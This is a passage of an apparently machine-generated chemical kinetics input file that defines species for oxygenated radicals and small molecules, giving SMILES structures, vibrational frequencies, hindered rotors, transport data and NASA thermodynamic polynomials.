E0 = (-234.165,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3615,1310,387.5,850,1000,3000,3100,440,815,1455,1000,631.199,631.199,631.199,631.2],'cm^-1')),
HinderedRotor(inertia=(0.154163,'amu*angstrom^2'), symmetry=1, barrier=(43.5852,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.154163,'amu*angstrom^2'), symmetry=1, barrier=(43.5853,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.154163,'amu*angstrom^2'), symmetry=1, barrier=(43.5853,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (75.0434,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3635.24,'J/mol'), sigma=(5.76225,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=567.82 K, Pc=43.11 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.3608,0.0242042,1.63595e-05,-4.45473e-08,2.01814e-11,-28093.7,18.81], Tmin=(100,'K'), Tmax=(954.621,'K')), NASAPolynomial(coeffs=[13.6646,0.00626349,-1.68383e-06,3.41178e-10,-2.97857e-14,-31592.6,-42.2214], Tmin=(954.621,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-234.165,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(170.447,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-O2s(Cds-O2d)) + group(O2s-OsH) + group(Cs-(Cds-O2d)HHH) + group(Cds-OdCsOs) + radical(CJCO)"""),
)
species(
label = 'CC=O(606)',
structure = SMILES('CC=O'),
E0 = (-177.906,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,1427.17,1427.17,1427.17,1427.17,3755.47],'cm^-1')),
HinderedRotor(inertia=(0.717734,'amu*angstrom^2'), symmetry=1, barrier=(16.5021,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (44.0526,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3625.12,'J/mol'), sigma=(3.97,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=2.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.70079,0.000387835,3.86929e-05,-4.52447e-08,1.58859e-11,-21380.9,9.13562], Tmin=(100,'K'), Tmax=(984.198,'K')), NASAPolynomial(coeffs=[4.58889,0.0128894,-4.91502e-06,9.26508e-10,-6.71011e-14,-22336,0.901072], Tmin=(984.198,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-177.906,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(153.818,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-O2d)HHH) + group(Cds-OdCsH)"""),
)
species(
label = 'C[CH]O[CH]C(=O)OO(3928)',
structure = SMILES('C[CH]O[CH]C(=O)OO'),
E0 = (-246.897,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3050,390,425,1340,1360,335,370,3615,1310,387.5,850,1000,2750,2800,2850,1350,1500,750,1050,1375,1000,200,800,933.333,1066.67,1200,1333.33,1466.67,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (118.088,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.766237,0.0899202,-9.58537e-05,4.86986e-08,-9.41707e-12,-29510.6,32.7391], Tmin=(100,'K'), Tmax=(1340.96,'K')), NASAPolynomial(coeffs=[24.4205,0.0109432,-3.20725e-06,4.99769e-10,-3.2386e-14,-35919.6,-94.8724], Tmin=(1340.96,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-246.897,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(307.635,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-O2s(Cds-O2d)) + group(O2s-OsH) + group(Cs-CsOsHH) + group(Cs-(Cds-O2d)OsHH) + group(Cs-CsHHH) + group(Cds-OdCsOs) + radical(CCsJOCs) + radical(CCsJOCs)"""),
)
species(
label = 'H(8)',
structure = SMILES('[H]'),
E0 = (211.805,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (1.00794,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1205.6,'J/mol'), sigma=(2.05,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,9.24385e-15,-1.3678e-17,6.66185e-21,-1.00107e-24,25474.2,-0.444973], Tmin=(100,'K'), Tmax=(3459.6,'K')), NASAPolynomial(coeffs=[2.5,9.20456e-12,-3.58608e-15,6.15199e-19,-3.92042e-23,25474.2,-0.444973], Tmin=(3459.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(211.805,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""H""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = 'C=COC[C]([O])OO(1305)',
structure = SMILES('C=COC[C]([O])OO'),
E0 = (-43.109,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3615,1310,387.5,850,1000,360,370,350,2950,3100,1380,975,1025,1650,3010,987.5,1337.5,450,1655,2750,2850,1437.5,1250,1305,750,350,200,800,1066.67,1333.33,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (118.088,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.121597,0.0842122,-9.25798e-05,5.09531e-08,-1.1085e-11,-5044.15,30.7827], Tmin=(100,'K'), Tmax=(1117.42,'K')), NASAPolynomial(coeffs=[17.1748,0.023167,-1.06337e-05,2.06289e-09,-1.46732e-13,-8855.26,-53.3825], Tmin=(1117.42,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-43.109,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(311.793,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-Cs(Cds-Cd)) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cds-CdsOsH) + group(Cds-CdsHH) + radical(CCOJ) + radical(Cs_P)"""),
)
species(
label = '[CH2][C]([O])OO(1352)',
structure = SMILES('[CH2][C]([O])OO'),
E0 = (259.617,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3615,1310,387.5,850,1000,3000,3100,440,815,1455,1000,360,370,350,180],'cm^-1')),
HinderedRotor(inertia=(0.365969,'amu*angstrom^2'), symmetry=1, barrier=(8.41434,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0124941,'amu*angstrom^2'), symmetry=1, barrier=(36.0133,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0124334,'amu*angstrom^2'), symmetry=1, barrier=(36.0196,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 4,
opticalIsomers = 1,
molecularWeight = (75.0434,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.07061,0.0487342,-8.34891e-05,7.95986e-08,-2.95498e-11,31288.1,22.2062], Tmin=(100,'K'), Tmax=(816.093,'K')), NASAPolynomial(coeffs=[4.97245,0.0220937,-1.16997e-05,2.30933e-09,-1.61703e-13,31227.9,11.3297], Tmin=(816.093,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(259.617,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(170.447,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsHHH) + radical(Cs_P) + radical(CCOJ) + radical(CJCOOH)"""),
)
species(
label = 'OH(D)(132)',
structure = SMILES('[OH]'),
E0 = (28.3945,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3668.68],'cm^-1')),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (17.0073,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(665.16,'J/mol'), sigma=(2.75,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.51457,2.92814e-05,-5.32177e-07,1.01951e-09,-3.85951e-13,3414.25,2.10435], Tmin=(100,'K'), Tmax=(1145.75,'K')), NASAPolynomial(coeffs=[3.07194,0.000604011,-1.39759e-08,-2.13452e-11,2.4807e-15,3579.39,4.57799], Tmin=(1145.75,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(28.3945,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""OH(D)""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = 'C[CH]OCC([O])=O(3648)',
structure = SMILES('C[CH]OCC([O])=O'),
E0 = (-199.487,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2850,1437.5,1250,1305,750,350,2750,2800,2850,1350,1500,750,1050,1375,1000,200,800,914.286,1028.57,1142.86,1257.14,1371.43,1485.71,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (102.089,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.46314,0.0613079,-6.22203e-05,3.87033e-08,-1.06974e-11,-23906.2,23.2433], Tmin=(100,'K'), Tmax=(842.438,'K')), NASAPolynomial(coeffs=[6.72459,0.0363249,-1.77353e-05,3.49857e-09,-2.49761e-13,-24792.6,-1.23782], Tmin=(842.438,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-199.487,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(291.007,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-(Cds-O2d)H) + group(Cs-CsOsHH) + group(Cs-(Cds-O2d)OsHH) + group(Cs-CsHHH) + group(Cds-OdCsOs) + radical(CCOJ) + radical(CCsJOCs)"""),
)
species(
label = 'C[CH]O[CH]C([O])OO(3929)',
structure = SMILES('C[CH]O[CH]C([O])OO'),
E0 = (24.6908,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.583755,0.110366,-0.000178981,1.5404e-07,-5.19416e-11,3125.51,33.8148], Tmin=(100,'K'), Tmax=(830.728,'K')), NASAPolynomial(coeffs=[11.9142,0.0355875,-1.75944e-05,3.36956e-09,-2.31738e-13,1552.81,-21.1307], Tmin=(830.728,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(24.6908,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(332.579,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CCOJ) + radical(CCsJOCs) + radical(CCsJOCs)"""),
)
species(
label = '[CH2]COC[C]([O])OO(3930)',
structure = SMILES('[CH2]COC[C]([O])OO'),
E0 = (80.6142,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3615,1310,387.5,850,1000,360,370,350,3000,3100,440,815,1455,1000,2750,2783.33,2816.67,2850,1425,1450,1225,1275,1270,1340,700,800,300,400,200,800,1066.67,1333.33,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 4,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.0900314,0.102235,-0.000171121,1.59101e-07,-5.76576e-11,9831.05,34.47], Tmin=(100,'K'), Tmax=(826.847,'K')), NASAPolynomial(coeffs=[6.9374,0.0443169,-2.26546e-05,4.40578e-09,-3.05791e-13,9486.66,6.84779], Tmin=(826.847,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(80.6142,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(332.579,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CJCO) + radical(Cs_P) + radical(CCOJ)"""),
)
species(
label = 'CCO[CH][C]([O])OO(3931)',
structure = SMILES('CCO[CH][C]([O])OO'),
E0 = (49.4811,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,3615,1310,387.5,850,1000,360,370,350,2750,2800,2850,1350,1500,750,1050,1375,1000,2750,2850,1437.5,1250,1305,750,350,200,800,1066.67,1333.33,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 4,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.236154,0.104005,-0.000170191,1.52902e-07,-5.38872e-11,6093.29,33.8078], Tmin=(100,'K'), Tmax=(825.151,'K')), NASAPolynomial(coeffs=[8.87185,0.040771,-2.05515e-05,3.97681e-09,-2.75404e-13,5239.83,-4.44613], Tmin=(825.151,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(49.4811,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(332.579,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CCOJ) + radical(CCsJOCs) + radical(Cs_P)"""),
)
species(
label = 'C[CH]OCC([O])O[O](3932)',
structure = SMILES('C[CH]OCC([O])O[O]'),
E0 = (-3.76056,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.0170414,0.099763,-0.000164669,1.5006e-07,-5.31149e-11,-318.631,33.0925], Tmin=(100,'K'), Tmax=(843.19,'K')), NASAPolynomial(coeffs=[7.47209,0.0414355,-2.03468e-05,3.883e-09,-2.66247e-13,-771.083,3.04532], Tmin=(843.19,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-3.76056,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(ROOJ) + radical(CCsJOCs) + radical(CCOJ)"""),
)
species(
label = 'C[CH]O[CH][C](O)OO(3933)',
structure = SMILES('C[CH]O[CH][C](O)OO'),
E0 = (4.23197,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.696058,0.110925,-0.000164595,1.20613e-07,-3.29485e-11,671.088,34.0698], Tmin=(100,'K'), Tmax=(698.899,'K')), NASAPolynomial(coeffs=[16.1831,0.0272815,-1.28912e-05,2.43752e-09,-1.67317e-13,-2004.79,-43.5796], Tmin=(698.899,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(4.23197,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(328.422,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CCsJOCs) + radical(Cs_P) + radical(CCsJOCs)"""),
)
species(
label = 'C[CH]OC[C](O)O[O](3934)',
structure = SMILES('C[CH]OC[C](O)O[O]'),
E0 = (-24.2193,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.322819,0.102988,-0.000161773,1.35562e-07,-4.45665e-11,-2764.82,34.0192], Tmin=(100,'K'), Tmax=(842.134,'K')), NASAPolynomial(coeffs=[11.9671,0.0327075,-1.5384e-05,2.88674e-09,-1.96312e-13,-4412.6,-20.6544], Tmin=(842.134,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-24.2193,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(332.579,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(Cs_P) + radical(CCsJOCs) + radical(ROOJ)"""),
)
species(
label = '[CH2][CH]OCC([O])OO(3935)',
structure = SMILES('[CH2][CH]OCC([O])OO'),
E0 = (55.8238,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,3615,1310,387.5,850,1000,3000,3100,440,815,1455,1000,1380,1390,370,380,2900,435,2750,2850,1437.5,1250,1305,750,350,200,800,1066.67,1333.33,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 4,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.436721,0.108584,-0.000179865,1.6017e-07,-5.56784e-11,6863.23,34.4739], Tmin=(100,'K'), Tmax=(831.701,'K')), NASAPolynomial(coeffs=[9.97759,0.0391373,-1.96999e-05,3.7991e-09,-2.62174e-13,5800.49,-9.82462], Tmin=(831.701,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(55.8238,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(332.579,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CCOJ) + radical(CJCO) + radical(CCsJOCs)"""),
)
species(
label = '[CH2][CH]OC[C](O)OO(3936)',
structure = SMILES('[CH2][CH]OC[C](O)OO'),
E0 = (35.365,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.731414,0.111665,-0.0001764,1.44828e-07,-4.67169e-11,4416.57,35.3615], Tmin=(100,'K'), Tmax=(821.04,'K')), NASAPolynomial(coeffs=[14.4469,0.0304556,-1.47648e-05,2.80959e-09,-1.92812e-13,2168.97,-33.3813], Tmin=(821.04,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(35.365,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(328.422,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CJCO) + radical(CCsJOCs) + radical(Cs_P)"""),
)
species(
label = 'CCOC[C]([O])O[O](3937)',
structure = SMILES('CCOC[C]([O])O[O]'),
E0 = (21.0298,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (119.096,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.330784,0.0933978,-0.000155853,1.48865e-07,-5.50219e-11,2649.14,33.0848], Tmin=(100,'K'), Tmax=(836.968,'K')), NASAPolynomial(coeffs=[4.43436,0.0466109,-2.32991e-05,4.48911e-09,-3.09816e-13,2914.06,19.7039], Tmin=(836.968,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(21.0298,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(336.736,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsCs) + group(O2s-OsCs) + group(O2s-CsH) + group(O2s-OsH) + group(Cs-CsOsOsH) + group(Cs-CsOsHH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(Cs_P) + radical(ROOJ) + radical(CCOJ)"""),
)
species(
label = 'C[CH][O](605)',
structure = SMILES('C[CH][O]'),
E0 = (149.432,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,3025,407.5,1350,352.5,2066.51],'cm^-1')),
HinderedRotor(inertia=(0.362113,'amu*angstrom^2'), symmetry=1, barrier=(8.32568,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (44.0526,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.20363,0.021847,-3.14755e-05,3.43227e-08,-1.42322e-11,17997,11.0861], Tmin=(100,'K'), Tmax=(846.374,'K')), NASAPolynomial(coeffs=[1.2024,0.020386,-9.53523e-06,1.79858e-09,-1.23081e-13,18726.8,22.7175], Tmin=(846.374,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(149.432,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(153.818,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-CsOsHH) + group(Cs-CsHHH) + radical(CCsJOH) + radical(CCOJ)"""),
)
species(
label = 'C[CH]OC[C]([O])[O](3645)',
structure = SMILES('C[CH]OC[C]([O])[O]'),
E0 = (203.681,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2850,1437.5,1250,1305,750,350,360,370,350,2750,2800,2850,1350,1500,750,1050,1375,1000,200,800,1000,1200,1400,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (102.089,'amu'),
